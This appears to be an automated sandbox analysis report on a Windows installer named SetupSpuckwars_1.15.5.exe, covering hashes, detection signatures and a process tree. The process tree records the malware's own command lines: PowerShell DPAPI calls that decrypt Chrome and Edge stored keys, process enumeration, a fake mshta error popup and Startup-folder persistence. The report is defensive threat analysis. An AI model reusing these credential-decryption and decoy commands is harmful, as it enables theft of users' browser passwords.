Edit tour
Windows
Analysis Report
SetupSpuckwars_1.15.5.exe
Overview
General Information
| Sample name: | SetupSpuckwars_1.15.5.exe |
| Analysis ID: | 1423647 |
| MD5: | 320696b6328d7d82817da50697fcb673 |
| SHA1: | 9cae6fdf42dda5ecc2c3a84c24488c132dc2f11c |
| SHA256: | 3b83e25ec4dec28c78cf89ae94e007e1928f09a3618b3b653f960d07c9e485b2 |
| Tags: | exe |
| Infos: |  |
 | |
Detection
| Score: | 52 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Drops PE files to the startup folder
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
SetupSpuckwars_1.15.5.exe (PID: 2248 cmdline: "C:\Users\ user\Deskt op\SetupSp uckwars_1. 15.5.exe" MD5: 320696B6328D7D82817DA50697FCB673) 
spuckwars.exe (PID: 6248 cmdline: C:\Users\u ser\AppDat a\Local\Te mp\2ejji11 5JyJwonCMe C4t6jNhr8O \spuckwars .exe MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2) 
cmd.exe (PID: 5792 cmdline: C:\Windows \system32\ cmd.exe /d /s /c "ta sklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6488 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
tasklist.exe (PID: 2752 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - spuckwars.exe (PID: 1132 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\2ejji1 15JyJwonCM eC4t6jNhr8 O\spuckwar s.exe" --t ype=gpu-pr ocess --us er-data-di r="C:\User s\user\App Data\Roami ng\spuckwa rs" --gpu- preference s=UAAAAAAA AADgAAAYAA AAAAAAAAAA AAAAAABgAA AAAAAwAAAA AAAAAAAAAA AQAAAAAAAA AAAAAAAAAA AAAAAAAEgA AAAAAAAASA AAAAAAAAAY AAAAAgAAAB AAAAAAAAAA GAAAAAAAAA AQAAAAAAAA AAAAAAAOAA AAEAAAAAAA AAABAAAADg AAAAgAAAAA AAAACAAAAA AAAAA= --m ojo-platfo rm-channel -handle=16 28 --field -trial-han dle=1784,i ,147360489 4384250192 9,38900172 4634846179 5,131072 - -disable-f eatures=Sp areRendere rForSitePe rProcess,W inRetrieve Suggestion sOnlyOnDem and /prefe tch:2 MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2) - spuckwars.exe (PID: 2960 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\2ejji1 15JyJwonCM eC4t6jNhr8 O\spuckwar s.exe" --t ype=utilit y --utilit y-sub-type =network.m ojom.Netwo rkService --lang=en- GB --servi ce-sandbox -type=none --user-da ta-dir="C: \Users\use r\AppData\ Roaming\sp uckwars" - -mojo-plat form-chann el-handle= 2052 --fie ld-trial-h andle=1784 ,i,1473604 8943842501 929,389001 7246348461 795,131072 --disable -features= SpareRende rerForSite PerProcess ,WinRetrie veSuggesti onsOnlyOnD emand /pre fetch:8 MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2) - cmd.exe (PID: 3472 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta sklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3532 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 5700 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 6268 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "po wershell.e xe Add-Typ e -Assembl yName Syst em.Securit y; [System .Security. Cryptograp hy.Protect edData]::U nprotect([ byte[]]@(1 ,0,0,0,208 ,140,157,2 23,1,21,20 9,17,140,1 22,0,192,7 9,194,151, 235,1,0,0, 0,82,140,1 81,59,205, 133,36,68, 131,195,71 ,114,10,9, 65,24,16,0 ,0,0,28,0, 0,0,71,0,1 11,0,111,0 ,103,0,108 ,0,101,0,3 2,0,67,0,1 04,0,114,0 ,111,0,109 ,0,101,0,0 ,0,16,102, 0,0,0,1,0, 0,32,0,0,0 ,36,243,11 2,255,236, 176,19,21, 161,232,5, 156,15,224 ,214,169,1 85,79,161, 35,240,200 ,160,226,1 60,19,168, 214,186,23 9,155,235, 0,0,0,0,14 ,128,0,0,0 ,2,0,0,32, 0,0,0,225, 241,231,19 5,97,47,24 8,22,206,1 61,226,92, 44,44,51,2 07,166,8,4 6,136,147, 185,84,185 ,27,183,25 2,114,164, 252,148,16 8,48,0,0,0 ,2,140,235 ,235,139,9 9,133,55,1 60,143,64, 53,168,135 ,193,81,10 ,81,94,101 ,239,145,7 2,8,97,176 ,119,236,1 64,201,155 ,27,236,18 4,11,80,14 5,31,10,79 ,199,92,71 ,166,116,8 4,131,150, 64,0,0,0,3 3,136,240, 246,163,86 ,84,202,92 ,12,170,23 9,80,17,93 ,81,235,15 9,209,41,5 ,212,210,2 3,106,50,3 1,57,94,24 4,205,86,1 98,111,237 ,171,160,2 40,77,231, 4,197,113, 175,235,15 3,59,29,17 6,183,188, 244,160,18 6,186,93,1 46,97,116, 126,129,24 ,71,225), $null, 'Cu rrentUser' )" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5592 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 5368 cmdline: powershell .exe Add-T ype -Assem blyName Sy stem.Secur ity; [Syst em.Securit y.Cryptogr aphy.Prote ctedData]: :Unprotect ([byte[]]@ (1,0,0,0,2 08,140,157 ,223,1,21, 209,17,140 ,122,0,192 ,79,194,15 1,235,1,0, 0,0,82,140 ,181,59,20 5,133,36,6 8,131,195, 71,114,10, 9,65,24,16 ,0,0,0,28, 0,0,0,71,0 ,111,0,111 ,0,103,0,1 08,0,101,0 ,32,0,67,0 ,104,0,114 ,0,111,0,1 09,0,101,0 ,0,0,16,10 2,0,0,0,1, 0,0,32,0,0 ,0,36,243, 112,255,23 6,176,19,2 1,161,232, 5,156,15,2 24,214,169 ,185,79,16 1,35,240,2 00,160,226 ,160,19,16 8,214,186, 239,155,23 5,0,0,0,0, 14,128,0,0 ,0,2,0,0,3 2,0,0,0,22 5,241,231, 195,97,47, 248,22,206 ,161,226,9 2,44,44,51 ,207,166,8 ,46,136,14 7,185,84,1 85,27,183, 252,114,16 4,252,148, 168,48,0,0 ,0,2,140,2 35,235,139 ,99,133,55 ,160,143,6 4,53,168,1 35,193,81, 10,81,94,1 01,239,145 ,72,8,97,1 76,119,236 ,164,201,1 55,27,236, 184,11,80, 145,31,10, 79,199,92, 71,166,116 ,84,131,15 0,64,0,0,0 ,33,136,24 0,246,163, 86,84,202, 92,12,170, 239,80,17, 93,81,235, 159,209,41 ,5,212,210 ,23,106,50 ,31,57,94, 244,205,86 ,198,111,2 37,171,160 ,240,77,23 1,4,197,11 3,175,235, 153,59,29, 176,183,18 8,244,160, 186,186,93 ,146,97,11 6,126,129, 24,71,225) , $null, ' CurrentUse r') MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 3916 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "po wershell.e xe Add-Typ e -Assembl yName Syst em.Securit y; [System .Security. Cryptograp hy.Protect edData]::U nprotect([ byte[]]@(1 ,0,0,0,208 ,140,157,2 23,1,21,20 9,17,140,1 22,0,192,7 9,194,151, 235,1,0,0, 0,82,140,1 81,59,205, 133,36,68, 131,195,71 ,114,10,9, 65,24,16,0 ,0,0,30,0, 0,0,77,0,1 05,0,99,0, 114,0,111, 0,115,0,11 1,0,102,0, 116,0,32,0 ,69,0,100, 0,103,0,10 1,0,0,0,16 ,102,0,0,0 ,1,0,0,32, 0,0,0,73,2 31,212,88, 131,180,10 8,13,7,151 ,85,6,156, 66,67,185, 57,141,176 ,137,39,15 3,232,122, 3,148,29,9 7,139,226, 146,101,0, 0,0,0,14,1 28,0,0,0,2 ,0,0,32,0, 0,0,25,208 ,58,196,14 7,38,229,7 1,17,84,57 ,121,51,12 2,21,191,1 92,210,223 ,56,196,10 2,132,177, 163,7,170, 237,170,96 ,43,123,48 ,0,0,0,22, 214,107,18 0,137,106, 64,43,246, 209,3,97,1 83,60,179, 87,35,178, 252,209,63 ,28,6,231, 92,233,101 ,110,37,19 1,114,95,1 02,37,85,2 5,129,162, 60,71,136, 36,115,191 ,138,222,1 ,225,64,0, 0,0,221,12 8,244,169, 226,245,40 ,30,145,23 2,4,127,24 0,108,165, 92,23,225, 199,246,49 ,201,112,9 7,127,7,10 8,202,49,1 41,230,234 ,32,54,72, 203,159,33 ,237,81,19 5,247,232, 115,207,19 4,239,99,1 14,230,169 ,121,178,1 34,199,77, 110,131,11 5,20,107,2 31,17,6), $null, 'Cu rrentUser' )" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6488 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4544 cmdline:
powershell .exe Add-T ype -Assem blyName Sy stem.Secur ity; [Syst em.Securit y.Cryptogr aphy.Prote ctedData]: :Unprotect ([byte[]]@ (1,0,0,0,2 08,140,157 ,223,1,21, 209,17,140 ,122,0,192 ,79,194,15 1,235,1,0, 0,0,82,140 ,181,59,20 5,133,36,6 8,131,195, 71,114,10, 9,65,24,16 ,0,0,0,30, 0,0,0,77,0 ,105,0,99, 0,114,0,11 1,0,115,0, 111,0,102, 0,116,0,32 ,0,69,0,10 0,0,103,0, 101,0,0,0, 16,102,0,0 ,0,1,0,0,3 2,0,0,0,73 ,231,212,8 8,131,180, 108,13,7,1 51,85,6,15 6,66,67,18 5,57,141,1 76,137,39, 153,232,12 2,3,148,29 ,97,139,22 6,146,101, 0,0,0,0,14 ,128,0,0,0 ,2,0,0,32, 0,0,0,25,2 08,58,196, 147,38,229 ,71,17,84, 57,121,51, 122,21,191 ,192,210,2 23,56,196, 102,132,17 7,163,7,17 0,237,170, 96,43,123, 48,0,0,0,2 2,214,107, 180,137,10 6,64,43,24 6,209,3,97 ,183,60,17 9,87,35,17 8,252,209, 63,28,6,23 1,92,233,1 01,110,37, 191,114,95 ,102,37,85 ,25,129,16 2,60,71,13 6,36,115,1 91,138,222 ,1,225,64, 0,0,0,221, 128,244,16 9,226,245, 40,30,145, 232,4,127, 240,108,16 5,92,23,22 5,199,246, 49,201,112 ,97,127,7, 108,202,49 ,141,230,2 34,32,54,7 2,203,159, 33,237,81, 195,247,23 2,115,207, 194,239,99 ,114,230,1 69,121,178 ,134,199,7 7,110,131, 115,20,107 ,231,17,6) , $null, ' CurrentUse r') MD5: 04029E121A0CFA5991749937DD22A1D9) - spuckwars.exe (PID: 6524 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\2ejji1 15JyJwonCM eC4t6jNhr8 O\spuckwar s.exe" --t ype=utilit y --utilit y-sub-type =network.m ojom.Netwo rkService --lang=en- GB --servi ce-sandbox -type=none --user-da ta-dir="C: \Users\use r\AppData\ Roaming\sp uckwars" - -mojo-plat form-chann el-handle= 2388 --fie ld-trial-h andle=1784 ,i,1473604 8943842501 929,389001 7246348461 795,131072 --disable -features= SpareRende rerForSite PerProcess ,WinRetrie veSuggesti onsOnlyOnD emand /pre fetch:8 MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2) - cmd.exe (PID: 2584 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "st art /B cmd /c mshta "javascrip t:new Acti veXObject( 'WScript.S hell').Pop up('An err or occurre d while do wnloading files. Ple ase try ag ain later. ', 0, 'Err or', 16);c lose()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6352 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5788 cmdline:
cmd /c msh ta "javasc ript:new A ctiveXObje ct('WScrip t.Shell'). Popup('An error occu rred while downloadi ng files. Please try again lat er.', 0, ' Error', 16 );close()" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) 
mshta.exe (PID: 5656 cmdline: mshta "jav ascript:ne w ActiveXO bject('WSc ript.Shell ').Popup(' An error o ccurred wh ile downlo ading file s. Please try again later.', 0 , 'Error', 16);close ()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - spuckwars.exe (PID: 5372 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\2ejji1 15JyJwonCM eC4t6jNhr8 O\spuckwar s.exe" --t ype=gpu-pr ocess --di sable-gpu- sandbox -- use-gl=dis abled --gp u-vendor-i d=5140 --g pu-device- id=140 --g pu-sub-sys tem-id=0 - -gpu-revis ion=0 --gp u-driver-v ersion=10. 0.19041.54 6 --user-d ata-dir="C :\Users\us er\AppData \Roaming\s puckwars" --gpu-pref erences=UA AAAAAAAADo AAAYAAAAAA AAAAAAAAAA AABgAAAAAA AwAAAAAAAA AAAAAACQAA AAAAAAAAAA AAAAAAAAAA AAAEgAAAAA AAAASAAAAA AAAAAYAAAA AgAAABAAAA AAAAAAGAAA AAAAAAAQAA AAAAAAAAAA AAAOAAAAEA AAAAAAAAAB AAAADgAAAA gAAAAAAAAA CAAAAAAAAA A= --mojo- platform-c hannel-han dle=2492 - -field-tri al-handle= 1784,i,147 3604894384 2501929,38 9001724634 8461795,13 1072 --dis able-featu res=SpareR endererFor SitePerPro cess,WinRe trieveSugg estionsOnl yOnDemand /prefetch: 2 MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2)
- spuckwars.exe (PID: 7092 cmdline:
"C:\Users\ user\AppDa ta\Roaming \Microsoft \Windows\S tart Menu\ Programs\S tartup\spu ckwars.exe " MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |   |
|---|
| Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||